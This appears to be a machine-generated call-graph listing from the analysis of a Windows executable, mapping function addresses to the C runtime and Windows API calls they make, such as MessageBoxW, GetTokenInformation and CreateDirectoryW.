7ff72c652d34 FormatMessageW 16698->16699 16701 7ff72c652d6d 16699->16701 16702 7ff72c652d7f MessageBoxW 16699->16702 16703 7ff72c6526b0 48 API calls 16701->16703 16704 7ff72c65c550 _log10_special 8 API calls 16702->16704 16703->16702 16705 7ff72c652daf 16704->16705 16705->16275 16707 7ff72c653730 16706->16707 16708 7ff72c659340 GetFinalPathNameByHandleW CloseHandle 16706->16708 16707->16270 16707->16273 16708->16707 16710 7ff72c652834 16709->16710 16711 7ff72c6526b0 48 API calls 16710->16711 16712 7ff72c652887 16711->16712 16713 7ff72c664bd8 48 API calls 16712->16713 16714 7ff72c6528d0 MessageBoxW 16713->16714 16715 7ff72c65c550 _log10_special 8 API calls 16714->16715 16716 7ff72c652900 16715->16716 16716->16275 16718 7ff72c65946a WideCharToMultiByte 16717->16718 16719 7ff72c659495 16717->16719 16718->16719 16721 7ff72c6594ab __vcrt_freefls 16718->16721 16720 7ff72c6594b2 WideCharToMultiByte 16719->16720 16719->16721 16720->16721 16721->16271 16723 7ff72c6526d5 16722->16723 16724 7ff72c664bd8 48 API calls 16723->16724 16725 7ff72c6526f8 16724->16725 16725->16695 16729 7ff72c664c32 16726->16729 16727 7ff72c664c57 16728 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16727->16728 16743 7ff72c664c81 16728->16743 16729->16727 16730 7ff72c664c93 16729->16730 16744 7ff72c662f90 16730->16744 16733 7ff72c664d74 16735 7ff72c66a948 __free_lconv_mon 11 API calls 16733->16735 16734 7ff72c65c550 _log10_special 8 API calls 16736 7ff72c652d04 16734->16736 16735->16743 16736->16698 16737 7ff72c664d9a 16737->16733 16739 7ff72c664da4 16737->16739 16738 7ff72c664d49 16740 7ff72c66a948 __free_lconv_mon 11 API calls 16738->16740 16742 7ff72c66a948 __free_lconv_mon 11 API calls 16739->16742 16740->16743 16741 7ff72c664d40 16741->16733 16741->16738 16742->16743 16743->16734 16745 7ff72c662fce 16744->16745 16746 7ff72c662fbe 16744->16746 16747 7ff72c662fd7 16745->16747 16751 7ff72c663005 16745->16751 16748 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16746->16748 16749 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16747->16749 16750 7ff72c662ffd 16748->16750 16749->16750 16750->16733 16750->16737 16750->16738 16750->16741 16751->16746 16751->16750 16755 7ff72c6639a4 16751->16755 16788 7ff72c6633f0 16751->16788 16825 7ff72c662b80 16751->16825 16756 7ff72c663a57 16755->16756 16757 7ff72c6639e6 16755->16757 16760 7ff72c663a5c 16756->16760 16761 7ff72c663ab0 16756->16761 16758 7ff72c6639ec 16757->16758 16759 7ff72c663a81 16757->16759 16762 7ff72c663a20 16758->16762 16763 7ff72c6639f1 16758->16763 16848 7ff72c661d54 16759->16848 16764 7ff72c663a91 16760->16764 16770 7ff72c663a5e 16760->16770 16765 7ff72c663abf 16761->16765 16766 7ff72c663ac7 16761->16766 16767 7ff72c663aba 16761->16767 16762->16765 16771 7ff72c6639f7 16762->16771 16763->16766 16763->16771 16855 7ff72c661944 16764->16855 16786 7ff72c663af0 16765->16786 16866 7ff72c662164 16765->16866 16862 7ff72c6646ac 16766->16862 16767->16759 16767->16765 16769 7ff72c663a00 16769->16786 16828 7ff72c664158 16769->16828 16770->16769 16775 7ff72c663a6d 16770->16775 16771->16769 16776 7ff72c663a32 16771->16776 16784 7ff72c663a1b 16771->16784 16775->16759 16778 7ff72c663a72 16775->16778 16776->16786 16838 7ff72c664494 16776->16838 16778->16786 16844 7ff72c664558 16778->16844 16780 7ff72c65c550 _log10_special 8 API calls 16782 7ff72c663dea 16780->16782 16782->16751 16784->16786 16787 7ff72c663cdc 16784->16787 16873 7ff72c6647c0 16784->16873 16786->16780 16787->16786 16879 7ff72c66ea08 16787->16879 16789 7ff72c6633fe 16788->16789 16790 7ff72c663414 16788->16790 16792 7ff72c663454 16789->16792 16793 7ff72c663a57 16789->16793 16794 7ff72c6639e6 16789->16794 16791 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16790->16791 16790->16792 16791->16792 16792->16751 16797 7ff72c663a5c 16793->16797 16798 7ff72c663ab0 16793->16798 16795 7ff72c6639ec 16794->16795 16796 7ff72c663a81 16794->16796 16799 7ff72c663a20 16795->16799 16800 7ff72c6639f1 16795->16800 16805 7ff72c661d54 38 API calls 16796->16805 16801 7ff72c663a5e 16797->16801 16802 7ff72c663a91 16797->16802 16803 7ff72c663ac7 16798->16803 16804 7ff72c663aba 16798->16804 16808 7ff72c663abf 16798->16808 16806 7ff72c6639f7 16799->16806 16799->16808 16800->16803 16800->16806 16807 7ff72c663a00 16801->16807 16814 7ff72c663a6d 16801->16814 16810 7ff72c661944 38 API calls 16802->16810 16809 7ff72c6646ac 45 API calls 16803->16809 16804->16796 16804->16808 16822 7ff72c663a1b 16805->16822 16806->16807 16812 7ff72c663a32 16806->16812 16806->16822 16811 7ff72c664158 47 API calls 16807->16811 16824 7ff72c663af0 16807->16824 16813 7ff72c662164 38 API calls 16808->16813 16808->16824 16809->16822 16810->16822 16811->16822 16815 7ff72c664494 46 API calls 16812->16815 16812->16824 16813->16822 16814->16796 16816 7ff72c663a72 16814->16816 16815->16822 16818 7ff72c664558 37 API calls 16816->16818 16816->16824 16817 7ff72c65c550 _log10_special 8 API calls 16819 7ff72c663dea 16817->16819 16818->16822 16819->16751 16820 7ff72c663cdc 16823 7ff72c66ea08 46 API calls 16820->16823 16820->16824 16821 7ff72c6647c0 45 API calls 16821->16820 16822->16820 16822->16821 16822->16824 16823->16820 16824->16817 17105 7ff72c660fc8 16825->17105 16829 7ff72c66417e 16828->16829 16891 7ff72c660b80 16829->16891 16834 7ff72c6647c0 45 API calls 16835 7ff72c6642c3 16834->16835 16836 7ff72c6647c0 45 API calls 16835->16836 16837 7ff72c664351 16835->16837 16836->16837 16837->16784 16840 7ff72c6644c9 16838->16840 16839 7ff72c6644e7 16843 7ff72c66ea08 46 API calls 16839->16843 16840->16839 16841 7ff72c66450e 16840->16841 16842 7ff72c6647c0 45 API calls 16840->16842 16841->16784 16842->16839 16843->16841 16846 7ff72c664579 16844->16846 16845 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16847 7ff72c6645aa 16845->16847 16846->16845 16846->16847 16847->16784 16849 7ff72c661d87 16848->16849 16850 7ff72c661db6 16849->16850 16852 7ff72c661e73 16849->16852 16854 7ff72c661df3 16850->16854 17037 7ff72c660c28 16850->17037 16853 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16852->16853 16853->16854 16854->16784 16856 7ff72c661977 16855->16856 16857 7ff72c6619a6 16856->16857 16859 7ff72c661a63 16856->16859 16858 7ff72c660c28 12 API calls 16857->16858 16861 7ff72c6619e3 16857->16861 16858->16861 16860 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16859->16860 16860->16861 16861->16784 16863 7ff72c6646ef 16862->16863 16865 7ff72c6646f3 __crtLCMapStringW 16863->16865 17045 7ff72c664748 16863->17045 16865->16784 16867 7ff72c662197 16866->16867 16868 7ff72c6621c6 16867->16868 16870 7ff72c662283 16867->16870 16869 7ff72c660c28 12 API calls 16868->16869 16872 7ff72c662203 16868->16872 16869->16872 16871 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16870->16871 16871->16872 16872->16784 16874 7ff72c6647d7 16873->16874 17049 7ff72c66d9b8 16874->17049 16881 7ff72c66ea39 16879->16881 16889 7ff72c66ea47 16879->16889 16880 7ff72c66ea67 16883 7ff72c66ea78 16880->16883 16884 7ff72c66ea9f 16880->16884 16881->16880 16882 7ff72c6647c0 45 API calls 16881->16882 16881->16889 16882->16880 17095 7ff72c6700a0 16883->17095 16886 7ff72c66eac9 16884->16886 16887 7ff72c66eb2a 16884->16887 16884->16889 16886->16889 17098 7ff72c66f8a0 16886->17098 16888 7ff72c66f8a0 _fread_nolock MultiByteToWideChar 16887->16888 16888->16889 16889->16787 16892 7ff72c660bb7 16891->16892 16898 7ff72c660ba6 16891->16898 16892->16898 16921 7ff72c66d5fc 16892->16921 16895 7ff72c660bf8 16896 7ff72c66a948 __free_lconv_mon 11 API calls 16895->16896 16896->16898 16897 7ff72c66a948 __free_lconv_mon 11 API calls 16897->16895 16899 7ff72c66e570 16898->16899 16900 7ff72c66e58d 16899->16900 16901 7ff72c66e5c0 16899->16901 16902 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16900->16902 16901->16900 16904 7ff72c66e5f2 16901->16904 16911 7ff72c6642a1 16902->16911 16903 7ff72c66e705 16905 7ff72c66e7f7 16903->16905 16907 7ff72c66e7bd 16903->16907 16909 7ff72c66e78c 16903->16909 16912 7ff72c66e74f 16903->16912 16913 7ff72c66e745 16903->16913 16904->16903 16916 7ff72c66e63a 16904->16916 16961 7ff72c66da5c 16905->16961 16954 7ff72c66ddf4 16907->16954 16947 7ff72c66e0d4 16909->16947 16911->16834 16911->16835 16937 7ff72c66e304 16912->16937 16913->16907 16915 7ff72c66e74a 16913->16915 16915->16909 16915->16912 16916->16911 16928 7ff72c66a4a4 16916->16928 16919 7ff72c66a900 _isindst 17 API calls 16920 7ff72c66e854 16919->16920 16922 7ff72c66d647 16921->16922 16926 7ff72c66d60b memcpy_s 16921->16926 16924 7ff72c664f08 memcpy_s 11 API calls 16922->16924 16923 7ff72c66d62e HeapAlloc 16925 7ff72c660be4 16923->16925 16923->16926 16924->16925 16925->16895 16925->16897 16926->16922 16926->16923 16927 7ff72c673590 memcpy_s 2 API calls 16926->16927 16927->16926 16929 7ff72c66a4bb 16928->16929 16930 7ff72c66a4b1 16928->16930 16931 7ff72c664f08 memcpy_s 11 API calls 16929->16931 16930->16929 16932 7ff72c66a4d6 16930->16932 16936 7ff72c66a4c2 16931->16936 16933 7ff72c66a4ce 16932->16933 16935 7ff72c664f08 memcpy_s 11 API calls 16932->16935 16933->16911 16933->16919 16935->16936 16970 7ff72c66a8e0 16936->16970 16973 7ff72c6740ac 16937->16973 16941 7ff72c66e3ac 16942 7ff72c66e401 16941->16942 16943 7ff72c66e3cc 16941->16943 16946 7ff72c66e3b0 16941->16946 17026 7ff72c66def0 16942->17026 17022 7ff72c66e1ac 16943->17022 16946->16911 16948 7ff72c6740ac 38 API calls 16947->16948 16949 7ff72c66e11e 16948->16949 16950 7ff72c673af4 37 API calls 16949->16950 16951 7ff72c66e16e 16950->16951 16952 7ff72c66e172 16951->16952 16953 7ff72c66e1ac 45 API calls 16951->16953 16952->16911 16953->16952 16955 7ff72c6740ac 38 API calls 16954->16955 16956 7ff72c66de3f 16955->16956 16957 7ff72c673af4 37 API calls 16956->16957 16958 7ff72c66de97 16957->16958 16959 7ff72c66de9b 16958->16959 16960 7ff72c66def0 45 API calls 16958->16960 16959->16911 16960->16959 16962 7ff72c66dad4 16961->16962 16963 7ff72c66daa1 16961->16963 16965 7ff72c66daec 16962->16965 16967 7ff72c66db6d 16962->16967 16964 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 16963->16964 16969 7ff72c66dacd memcpy_s 16964->16969 16966 7ff72c66ddf4 46 API calls 16965->16966 16966->16969 16968 7ff72c6647c0 45 API calls 16967->16968 16967->16969 16968->16969 16969->16911 16971 7ff72c66a778 _invalid_parameter_noinfo 37 API calls 16970->16971 16972 7ff72c66a8f9 16971->16972 16972->16933 16974 7ff72c6740ff fegetenv 16973->16974 16975 7ff72c677e2c 37 API calls 16974->16975 16979 7ff72c674152 16975->16979 16976 7ff72c67417f 16981 7ff72c66a4a4 __std_exception_copy 37 API calls 16976->16981 16977 7ff72c674242 16978 7ff72c677e2c 37 API calls 16977->16978 16980 7ff72c67426c 16978->16980 16979->16977 16982 7ff72c67421c 16979->16982 16983 7ff72c67416d 16979->16983 16984 7ff72c677e2c 37 API calls 16980->16984 16985 7ff72c6741fd 16981->16985 16988 7ff72c66a4a4 __std_exception_copy 37 API calls 16982->16988 16983->16976 16983->16977 16986 7ff72c67427d 16984->16986 16987 7ff72c675324 16985->16987 16992 7ff72c674205 16985->16992 16989 7ff72c678020 20 API calls 16986->16989 16990 7ff72c66a900 _isindst 17 API calls 16987->16990 16988->16985 17000 7ff72c6742e6 memcpy_s 16989->17000 16991 7ff72c675339 16990->16991 16993 7ff72c65c550 _log10_special 8 API calls 16992->16993 16994 7ff72c66e351 16993->16994 17018 7ff72c673af4 16994->17018 16995 7ff72c67468f memcpy_s 16996 7ff72c6749cf 16997 7ff72c673c10 37 API calls 16996->16997 17004 7ff72c6750e7 16997->17004 16998 7ff72c67497b 16998->16996 17001 7ff72c67533c memcpy_s 37 API calls 16998->17001 16999 7ff72c674327 memcpy_s 17014 7ff72c674783 memcpy_s 16999->17014 17015 7ff72c674c6b memcpy_s 16999->17015 17000->16995 17000->16999 17002 7ff72c664f08 memcpy_s 11 API calls 17000->17002 17001->16996 17003 7ff72c674760 17002->17003 17005 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17003->17005 17006 7ff72c67533c memcpy_s 37 API calls 17004->17006 17017 7ff72c675142 17004->17017 17005->16999 17006->17017 17007 7ff72c6752c8 17008 7ff72c677e2c 37 API calls 17007->17008 17008->16992 17009 7ff72c664f08 11 API calls memcpy_s 17009->17014 17010 7ff72c664f08 11 API calls memcpy_s 17010->17015 17011 7ff72c673c10 37 API calls 17011->17017 17012 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 17012->17015 17013 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 17013->17014 17014->16998 17014->17009 17014->17013 17015->16996 17015->16998 17015->17010 17015->17012 17016 7ff72c67533c memcpy_s 37 API calls 17016->17017 17017->17007 17017->17011 17017->17016 17019 7ff72c673b13 17018->17019 17020 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17019->17020 17021 7ff72c673b3e memcpy_s 17019->17021 17020->17021 17021->16941 17023 7ff72c66e1d8 memcpy_s 17022->17023 17024 7ff72c6647c0 45 API calls 17023->17024 17025 7ff72c66e292 memcpy_s 17023->17025 17024->17025 17025->16946 17027 7ff72c66df2b 17026->17027 17031 7ff72c66df78 memcpy_s 17026->17031 17028 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17027->17028 17029 7ff72c66df57 17028->17029 17029->16946 17030 7ff72c66dfe3 17032 7ff72c66a4a4 __std_exception_copy 37 API calls 17030->17032 17031->17030 17033 7ff72c6647c0 45 API calls 17031->17033 17036 7ff72c66e025 memcpy_s 17032->17036 17033->17030 17034 7ff72c66a900 _isindst 17 API calls 17035 7ff72c66e0d0 17034->17035 17036->17034 17038 7ff72c660c5f 17037->17038 17043 7ff72c660c4e 17037->17043 17039 7ff72c66d5fc _fread_nolock 12 API calls 17038->17039 17038->17043 17040 7ff72c660c90 17039->17040 17042 7ff72c66a948 __free_lconv_mon 11 API calls 17040->17042 17044 7ff72c660ca4 17040->17044 17041 7ff72c66a948 __free_lconv_mon 11 API calls 17041->17043 17042->17044 17043->16854 17044->17041 17046 7ff72c66476e 17045->17046 17047 7ff72c664766 17045->17047 17046->16865 17048 7ff72c6647c0 45 API calls 17047->17048 17048->17046 17050 7ff72c6647ff 17049->17050 17051 7ff72c66d9d1 17049->17051 17053 7ff72c66da24 17050->17053 17051->17050 17057 7ff72c673304 17051->17057 17054 7ff72c66480f 17053->17054 17055 7ff72c66da3d 17053->17055 17054->16787 17055->17054 17092 7ff72c672650 17055->17092 17069 7ff72c66b150 GetLastError 17057->17069 17061 7ff72c67335e 17061->17050 17070 7ff72c66b174 FlsGetValue 17069->17070 17071 7ff72c66b191 FlsSetValue 17069->17071 17072 7ff72c66b18b 17070->17072 17089 7ff72c66b181 17070->17089 17073 7ff72c66b1a3 17071->17073 17071->17089 17072->17071 17075 7ff72c66eb98 memcpy_s 11 API calls 17073->17075 17074 7ff72c66b1fd SetLastError 17076 7ff72c66b21d 17074->17076 17077 7ff72c66b20a 17074->17077 17078 7ff72c66b1b2 17075->17078 17079 7ff72c66a504 _CreateFrameInfo 38 API calls 17076->17079 17077->17061 17091 7ff72c6702d8 EnterCriticalSection 17077->17091 17080 7ff72c66b1d0 FlsSetValue 17078->17080 17081 7ff72c66b1c0 FlsSetValue 17078->17081 17082 7ff72c66b222 17079->17082 17084 7ff72c66b1ee 17080->17084 17085 7ff72c66b1dc FlsSetValue 17080->17085 17083 7ff72c66b1c9 17081->17083 17087 7ff72c66a948 __free_lconv_mon 11 API calls 17083->17087 17086 7ff72c66aef4 memcpy_s 11 API calls 17084->17086 17085->17083 17088 7ff72c66b1f6 17086->17088 17087->17089 17090 7ff72c66a948 __free_lconv_mon 11 API calls 17088->17090 17089->17074 17090->17074 17093 7ff72c66b150 _CreateFrameInfo 45 API calls 17092->17093 17094 7ff72c672659 17093->17094 17101 7ff72c676d88 17095->17101 17100 7ff72c66f8a9 MultiByteToWideChar 17098->17100 17104 7ff72c676dec 17101->17104 17102 7ff72c65c550 _log10_special 8 API calls 17103 7ff72c6700bd 17102->17103 17103->16889 17104->17102 17106 7ff72c660ffd 17105->17106 17107 7ff72c66100f 17105->17107 17108 7ff72c664f08 memcpy_s 11 API calls 17106->17108 17110 7ff72c66101d 17107->17110 17114 7ff72c661059 17107->17114 17109 7ff72c661002 17108->17109 17111 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17109->17111 17112 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17110->17112 17119 7ff72c66100d 17111->17119 17112->17119 17113 7ff72c6613d5 17115 7ff72c664f08 memcpy_s 11 API calls 17113->17115 17113->17119 17114->17113 17116 7ff72c664f08 memcpy_s 11 API calls 17114->17116 17117 7ff72c661669 17115->17117 17118 7ff72c6613ca 17116->17118 17120 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17117->17120 17121 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17118->17121 17119->16751 17120->17119 17121->17113 17123 7ff72c660704 17122->17123 17150 7ff72c660464 17123->17150 17125 7ff72c66071d 17125->16287 17162 7ff72c6603bc 17126->17162 17130 7ff72c65c850 17129->17130 17131 7ff72c652930 GetCurrentProcessId 17130->17131 17132 7ff72c651c80 49 API calls 17131->17132 17133 7ff72c652979 17132->17133 17176 7ff72c664984 17133->17176 17138 7ff72c651c80 49 API calls 17139 7ff72c6529ff 17138->17139 17206 7ff72c652620 17139->17206 17142 7ff72c65c550 _log10_special 8 API calls 17143 7ff72c652a31 17142->17143 17143->16326 17145 7ff72c660119 17144->17145 17147 7ff72c651b89 17144->17147 17146 7ff72c664f08 memcpy_s 11 API calls 17145->17146 17148 7ff72c66011e 17146->17148 17147->16325 17147->16326 17149 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17148->17149 17149->17147 17151 7ff72c6604ce 17150->17151 17152 7ff72c66048e 17150->17152 17151->17152 17153 7ff72c6604da 17151->17153 17154 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17152->17154 17161 7ff72c66546c EnterCriticalSection 17153->17161 17156 7ff72c6604b5 17154->17156 17156->17125 17163 7ff72c6603e6 17162->17163 17174 7ff72c651a20 17162->17174 17164 7ff72c6603f5 memcpy_s 17163->17164 17165 7ff72c660432 17163->17165 17163->17174 17168 7ff72c664f08 memcpy_s 11 API calls 17164->17168 17175 7ff72c66546c EnterCriticalSection 17165->17175 17170 7ff72c66040a 17168->17170 17172 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17170->17172 17172->17174 17174->16294 17174->16295 17178 7ff72c6649de 17176->17178 17177 7ff72c664a03 17179 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17177->17179 17178->17177 17180 7ff72c664a3f 17178->17180 17182 7ff72c664a2d 17179->17182 17215 7ff72c662c10 17180->17215 17185 7ff72c65c550 _log10_special 8 API calls 17182->17185 17183 7ff72c664b1c 17184 7ff72c66a948 __free_lconv_mon 11 API calls 17183->17184 17184->17182 17187 7ff72c6529c3 17185->17187 17194 7ff72c665160 17187->17194 17188 7ff72c664b40 17188->17183 17191 7ff72c664b4a 17188->17191 17189 7ff72c664af1 17192 7ff72c66a948 __free_lconv_mon 11 API calls 17189->17192 17190 7ff72c664ae8 17190->17183 17190->17189 17193 7ff72c66a948 __free_lconv_mon 11 API calls 17191->17193 17192->17182 17193->17182 17195 7ff72c66b2c8 memcpy_s 11 API calls 17194->17195 17196 7ff72c665177 17195->17196 17197 7ff72c6529e5 17196->17197 17198 7ff72c66eb98 memcpy_s 11 API calls 17196->17198 17200 7ff72c6651b7 17196->17200 17197->17138 17199 7ff72c6651ac 17198->17199 17201 7ff72c66a948 __free_lconv_mon 11 API calls 17199->17201 17200->17197 17353 7ff72c66ec20 17200->17353 17201->17200 17204 7ff72c66a900 _isindst 17 API calls 17205 7ff72c6651fc 17204->17205 17207 7ff72c65262f 17206->17207 17208 7ff72c659390 2 API calls 17207->17208 17209 7ff72c652660 17208->17209 17210 7ff72c652683 MessageBoxA 17209->17210 17211 7ff72c65266f MessageBoxW 17209->17211 17212 7ff72c652690 17210->17212 17211->17212 17213 7ff72c65c550 _log10_special 8 API calls 17212->17213 17214 7ff72c6526a0 17213->17214 17214->17142 17216 7ff72c662c4e 17215->17216 17217 7ff72c662c3e 17215->17217 17218 7ff72c662c57 17216->17218 17219 7ff72c662c85 17216->17219 17222 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17217->17222 17220 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17218->17220 17219->17217 17221 7ff72c662c7d 17219->17221 17223 7ff72c6647c0 45 API calls 17219->17223 17224 7ff72c662f34 17219->17224 17229 7ff72c6635a0 17219->17229 17255 7ff72c663268 17219->17255 17285 7ff72c662af0 17219->17285 17220->17221 17221->17183 17221->17188 17221->17189 17221->17190 17222->17221 17223->17219 17227 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17224->17227 17227->17217 17230 7ff72c663655 17229->17230 17231 7ff72c6635e2 17229->17231 17232 7ff72c66365a 17230->17232 17233 7ff72c6636af 17230->17233 17234 7ff72c6635e8 17231->17234 17235 7ff72c66367f 17231->17235 17236 7ff72c66365c 17232->17236 17237 7ff72c66368f 17232->17237 17233->17235 17246 7ff72c6636be 17233->17246 17252 7ff72c663618 17233->17252 17242 7ff72c6635ed 17234->17242 17234->17246 17302 7ff72c661b50 17235->17302 17238 7ff72c6635fd 17236->17238 17245 7ff72c66366b 17236->17245 17309 7ff72c661740 17237->17309 17253 7ff72c6636ed 17238->17253 17288 7ff72c663f04 17238->17288 17242->17238 17244 7ff72c663630 17242->17244 17242->17252 17244->17253 17298 7ff72c6643c0 17244->17298 17245->17235 17247 7ff72c663670 17245->17247 17246->17253 17316 7ff72c661f60 17246->17316 17250 7ff72c664558 37 API calls 17247->17250 17247->17253 17249 7ff72c65c550 _log10_special 8 API calls 17251 7ff72c663983 17249->17251 17250->17252 17251->17219 17252->17253 17323 7ff72c66e858 17252->17323 17253->17249 17256 7ff72c663289 17255->17256 17257 7ff72c663273 17255->17257 17258 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17256->17258 17263 7ff72c6632c7 17256->17263 17259 7ff72c663655 17257->17259 17260 7ff72c6635e2 17257->17260 17257->17263 17258->17263 17261 7ff72c66365a 17259->17261 17262 7ff72c6636af 17259->17262 17264 7ff72c6635e8 17260->17264 17265 7ff72c66367f 17260->17265 17266 7ff72c66365c 17261->17266 17267 7ff72c66368f 17261->17267 17262->17265 17268 7ff72c6636be 17262->17268 17283 7ff72c663618 17262->17283 17263->17219 17264->17268 17272 7ff72c6635ed 17264->17272 17269 7ff72c661b50 38 API calls 17265->17269 17273 7ff72c6635fd 17266->17273 17276 7ff72c66366b 17266->17276 17270 7ff72c661740 38 API calls 17267->17270 17275 7ff72c661f60 38 API calls 17268->17275 17284 7ff72c6636ed 17268->17284 17269->17283 17270->17283 17271 7ff72c663f04 47 API calls 17271->17283 17272->17273 17274 7ff72c663630 17272->17274 17272->17283 17273->17271 17273->17284 17277 7ff72c6643c0 47 API calls 17274->17277 17274->17284 17275->17283 17276->17265 17278 7ff72c663670 17276->17278 17277->17283 17280 7ff72c664558 37 API calls 17278->17280 17278->17284 17279 7ff72c65c550 _log10_special 8 API calls 17281 7ff72c663983 17279->17281 17280->17283 17281->17219 17282 7ff72c66e858 47 API calls 17282->17283 17283->17282 17283->17284 17284->17279 17336 7ff72c660d14 17285->17336 17289 7ff72c663f26 17288->17289 17290 7ff72c660b80 12 API calls 17289->17290 17291 7ff72c663f6e 17290->17291 17292 7ff72c66e570 46 API calls 17291->17292 17293 7ff72c664041 17292->17293 17294 7ff72c6647c0 45 API calls 17293->17294 17295 7ff72c664063 17293->17295 17294->17295 17296 7ff72c6647c0 45 API calls 17295->17296 17297 7ff72c6640ec 17295->17297 17296->17297 17297->17252 17299 7ff72c664440 17298->17299 17300 7ff72c6643d8 17298->17300 17299->17252 17300->17299 17301 7ff72c66e858 47 API calls 17300->17301 17301->17299 17303 7ff72c661b83 17302->17303 17304 7ff72c661bb2 17303->17304 17306 7ff72c661c6f 17303->17306 17305 7ff72c660b80 12 API calls 17304->17305 17308 7ff72c661bef 17304->17308 17305->17308 17307 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17306->17307 17307->17308 17308->17252 17310 7ff72c661773 17309->17310 17311 7ff72c6617a2 17310->17311 17313 7ff72c66185f 17310->17313 17312 7ff72c660b80 12 API calls 17311->17312 17315 7ff72c6617df 17311->17315 17312->17315 17314 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17313->17314 17314->17315 17315->17252 17317 7ff72c661f93 17316->17317 17318 7ff72c661fc2 17317->17318 17320 7ff72c66207f 17317->17320 17319 7ff72c660b80 12 API calls 17318->17319 17322 7ff72c661fff 17318->17322 17319->17322 17321 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17320->17321 17321->17322 17322->17252 17324 7ff72c66e880 17323->17324 17325 7ff72c66e8c5 17324->17325 17326 7ff72c6647c0 45 API calls 17324->17326 17327 7ff72c66e885 memcpy_s 17324->17327 17329 7ff72c66e8ae memcpy_s 17324->17329 17325->17327 17325->17329 17333 7ff72c6707e8 17325->17333 17326->17325 17327->17252 17328 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17328->17327 17329->17327 17329->17328 17335 7ff72c67080c WideCharToMultiByte 17333->17335 17337 7ff72c660d53 17336->17337 17338 7ff72c660d41 17336->17338 17341 7ff72c660d60 17337->17341 17344 7ff72c660d9d 17337->17344 17339 7ff72c664f08 memcpy_s 11 API calls 17338->17339 17340 7ff72c660d46 17339->17340 17342 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17340->17342 17343 7ff72c66a814 _invalid_parameter_noinfo 37 API calls 17341->17343 17348 7ff72c660d51 17342->17348 17343->17348 17345 7ff72c660e46 17344->17345 17346 7ff72c664f08 memcpy_s 11 API calls 17344->17346 17347 7ff72c664f08 memcpy_s 11 API calls 17345->17347 17345->17348 17349 7ff72c660e3b 17346->17349 17350 7ff72c660ef0 17347->17350 17348->17219 17352 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17349->17352 17351 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17350->17351 17351->17348 17352->17345 17357 7ff72c66ec3d 17353->17357 17354 7ff72c66ec42 17355 7ff72c6651dd 17354->17355 17356 7ff72c664f08 memcpy_s 11 API calls 17354->17356 17355->17197 17355->17204 17358 7ff72c66ec4c 17356->17358 17357->17354 17357->17355 17360 7ff72c66ec8c 17357->17360 17359 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 17358->17359 17359->17355 17360->17355 17361 7ff72c664f08 memcpy_s 11 API calls 17360->17361 17361->17358 17363 7ff72c658633 __vcrt_freefls 17362->17363 17364 7ff72c6585b1 GetTokenInformation 17362->17364 17367 7ff72c65864c 17363->17367 17368 7ff72c658646 CloseHandle 17363->17368 17365 7ff72c6585dd 17364->17365 17366 7ff72c6585d2 GetLastError 17364->17366 17365->17363 17369 7ff72c6585f9 GetTokenInformation 17365->17369 17366->17363 17366->17365 17367->16344 17368->17367 17369->17363 17371 7ff72c65861c 17369->17371 17370 7ff72c658626 ConvertSidToStringSidW 17370->17363 17371->17363 17371->17370 17373 7ff72c65c850 17372->17373 17374 7ff72c652b74 GetCurrentProcessId 17373->17374 17375 7ff72c6526b0 48 API calls 17374->17375 17376 7ff72c652bc7 17375->17376 17377 7ff72c664bd8 48 API calls 17376->17377 17378 7ff72c652c10 MessageBoxW 17377->17378 17379 7ff72c65c550 _log10_special 8 API calls 17378->17379 17380 7ff72c652c40 17379->17380 17380->16354 17382 7ff72c6525e5 17381->17382 17383 7ff72c664bd8 48 API calls 17382->17383 17384 7ff72c652604 17383->17384 17384->16370 17430 7ff72c668794 17385->17430 17389 7ff72c6581dc 17388->17389 17390 7ff72c659390 2 API calls 17389->17390 17391 7ff72c6581fb 17390->17391 17392 7ff72c658203 17391->17392 17393 7ff72c658216 ExpandEnvironmentStringsW 17391->17393 17395 7ff72c652810 49 API calls 17392->17395 17394 7ff72c65823c __vcrt_freefls 17393->17394 17396 7ff72c658253 17394->17396 17397 7ff72c658240 17394->17397 17419 7ff72c65820f __vcrt_freefls 17395->17419 17401 7ff72c6582bf 17396->17401 17402 7ff72c658261 GetDriveTypeW 17396->17402 17398 7ff72c652810 49 API calls 17397->17398 17398->17419 17399 7ff72c65c550 _log10_special 8 API calls 17400 7ff72c6583af 17399->17400 17400->16368 17420 7ff72c668238 17400->17420 17568 7ff72c667e08 17401->17568 17406 7ff72c658295 17402->17406 17407 7ff72c6582b0 17402->17407 17405 7ff72c6582d1 17409 7ff72c6582d9 17405->17409 17413 7ff72c6582ec 17405->17413 17410 7ff72c652810 49 API calls 17406->17410 17561 7ff72c66796c 17407->17561 17411 7ff72c652810 49 API calls 17409->17411 17410->17419 17411->17419 17412 7ff72c65834e CreateDirectoryW 17414 